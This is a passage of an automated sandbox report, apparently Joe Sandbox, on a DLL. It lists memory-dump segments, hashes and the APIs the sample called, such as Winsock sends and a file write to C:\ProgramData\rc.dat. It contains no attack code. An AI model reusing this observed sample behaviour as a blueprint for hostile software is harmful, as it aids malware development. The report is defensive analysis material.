                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandleResumeThread__beginthreadex
                              • String ID:
                              • API String ID: 1685284544-0
                              • Opcode ID: 8afa16ec0fb56171596614736cf1bc919732e8ff7525d65b26f6b7ab8e95b850
                              • Instruction ID: e194f94a27144a222b9fc1f0c13122163ef1aaae25fe94c4f68dd933092e1c32
                              • Opcode Fuzzy Hash: 8afa16ec0fb56171596614736cf1bc919732e8ff7525d65b26f6b7ab8e95b850
                              • Instruction Fuzzy Hash: F1F0AF72340201ABD7108E68CCC4F9173B8EF49329F34052AF565C7680C775A8939A90
                              APIs
                              • InterlockedIncrement.KERNEL32 ref: 6CEB1DD0
                              • WSAStartup.WS2_32(?,?), ref: 6CEB1DF4
                              • InterlockedExchange.KERNEL32(?,00000000), ref: 6CEB1DFF
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Interlocked$ExchangeIncrementStartup
                              • String ID:
                              • API String ID: 1856147945-0
                              • Opcode ID: d48c0b7cda7f13df628c28f8c26059318ce12f75b76e07220ab2295fce538833
                              • Instruction ID: 822dc3e4cd678ea78fc306979d2c4513e05703292fbd80e1e7d0e6cc7c23a3dc
                              • Opcode Fuzzy Hash: d48c0b7cda7f13df628c28f8c26059318ce12f75b76e07220ab2295fce538833
                              • Instruction Fuzzy Hash: BEE09B729001186F8650E599D8488F777FCEB0F376B400616F5D9C3540EA34D95897F5
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: H_prolog
                              • String ID: qrstuvwxyzeioubd
                              • API String ID: 3519838083-835419285
                              • Opcode ID: 2d80421a36b8d430e294dfb28d9fd49900e9ded50fdc65d9c443d57af3a35b77
                              • Instruction ID: f639772d8bb3cc800c7e1ad842e14b19e54494e26113f831843f3c85a9c85363
                              • Opcode Fuzzy Hash: 2d80421a36b8d430e294dfb28d9fd49900e9ded50fdc65d9c443d57af3a35b77
                              • Instruction Fuzzy Hash: 219140B6C0060D9ACF04DFE4CA44AFEB7B8AF19218F24415ED905B7750EB39964DCBA1
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: H_prolog
                              • String ID: oubd
                              • API String ID: 3519838083-221200022
                              • Opcode ID: 410aa3e5ab9965250faed138fa39001c0f7f80808bba279afe5a2723833c897d
                              • Instruction ID: 387dcbbfd352859795e15e4d6091cd6670c9d8aa7958d74d0cbba65895e6e1c6
                              • Opcode Fuzzy Hash: 410aa3e5ab9965250faed138fa39001c0f7f80808bba279afe5a2723833c897d
                              • Instruction Fuzzy Hash: 0C217F75600605DBCB14CFA5C241AAAB7B1FF44768F35825DE8556BB41DB30EE06CB90
                              APIs
                              • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat), ref: 6CF0E196
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID: C:\ProgramData\rc.dat
                              • API String ID: 823142352-1224088808
                              • Opcode ID: 2fb519d456c48fce670b4a8318046a082372f4e73051948024415bc3981194d4
                              • Instruction ID: 8885737e6dc72afb3d8f600e5a0814f3f1f60ccf86759ae3eb10def148027d74
                              • Opcode Fuzzy Hash: 2fb519d456c48fce670b4a8318046a082372f4e73051948024415bc3981194d4
                              • Instruction Fuzzy Hash: C2A00277388044C696E896D8452860A2A307657B967114941F45191C418A914501B672
                              APIs
                                • Part of subcall function 6CEB332E: WSASetLastError.WS2_32(00000000,?,00000045,00000000,00000065,?,6CEB3A3A,00000001,00000000,?,?,6CEBBA59,?,?,6CEBBA59), ref: 6CEB333B
                                • Part of subcall function 6CEB332E: WSASend.WS2_32(00000065,00000001,?,00000000,6CEBBA59,00000000,00000000), ref: 6CEB3359
                              • WSASetLastError.WS2_32 ref: 6CEB3469
                              • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 6CEB347E
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$Sendselect
                              • String ID:
                              • API String ID: 2958345159-0
                              • Opcode ID: 52ebe6cd2a31cc818c7e30d1432d6c9a3ce79d51949b35c0875f00c2f08e2c85
                              • Instruction ID: c324431c536644433b22237e80e855aada1964d33dc3fe5a5bc86f35bf1c7b03
                              • Opcode Fuzzy Hash: 52ebe6cd2a31cc818c7e30d1432d6c9a3ce79d51949b35c0875f00c2f08e2c85
                              • Instruction Fuzzy Hash: 6131C371605305AFE7008F65CA02BAB7BF4EF4536CF24462DF8A4A7680EF35D5098B91
                              APIs
                              • WSASetLastError.WS2_32(00000000,?,00000045,00000000,00000065,?,6CEB3A3A,00000001,00000000,?,?,6CEBBA59,?,?,6CEBBA59), ref: 6CEB333B
                              • WSASend.WS2_32(00000065,00000001,?,00000000,6CEBBA59,00000000,00000000), ref: 6CEB3359
                                • Part of subcall function 6CEBE8BD: WSAGetLastError.WS2_32(00000000,?,?,?,6CEB3747,00000000), ref: 6CEBE8C8
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
